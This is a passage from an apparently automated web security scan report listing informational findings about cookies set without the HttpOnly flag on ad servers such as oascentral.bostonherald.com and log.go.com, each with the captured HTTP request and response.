Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxFybENwCAMBMBdPIHfiWT0HuZFSU2J2J1Q5drrBNek06w6g2vQaxKNhkQqFf7KEwrBahD%252Ftm9xt7meu3sfKQYUNg%253D%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 01:13:58 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 01:13:58 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NDOLN440MTOINzA3jTeMNlaxrawFAggzg; expires=Sun, 15-Jan-2012 01:13:59 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 01:13:59 GMT
Server: HTTP server


12.108. http://log.go.com/log  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.go.com
Path:   /log

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?ft=j&srvc=abc&addata=2214:65390:815034:65390&tqq=$D$&method=GET&cap=1:815034:3:24&svr=3ps.go.com&host=3ps.go.com&guid=C0945A09-F31E-4772-97EC-0345A14C8BF0&sf= HTTP/1.1
Host: log.go.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Rectangles-Remnant&url=/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%253Aeve-french%7C1316240974600%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: SEEN2=um8Mie4Oum8Mie4Oum8Mie4O:; path=/; expires=Sat, 01 Oct 2011 00:58:09 GMT; domain=.go.com
Set-Cookie: TSC=1; path=/; domain=.go.com
P3P: CP="ALL ADM DEV PSAi COM NAV OUR OTR STP IND DEM"


12.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O10226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk; expires=Tue, 17-Sep-13 01:01:07 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3116
Content-Type: application/x-javascript

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

12.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1540
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/
...[SNIP]...

12.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:02 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O2021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:02 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1541
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.c
...[SNIP]...

12.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1518
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/R
...[SNIP]...

12.113. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO10226Kk; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3090
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

12.114. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGH; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1223
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<script language="JavaScript" type="text/javascript">\n');
document.write ('document.write(');
document.write ("'");
document.write ('<script language="JavaScript" src="http://ad.doub
...[SNIP]...

12.115. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO101yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1506
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.c
...[SNIP]...

12.116. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1462
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/R
...[SNIP]...

12.117. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO101yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

12.118. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:30 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3114
Content-Type: application/x-javascript

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

12.119. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:30 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1539
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/
...[SNIP]...

12.120. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

Issue detail

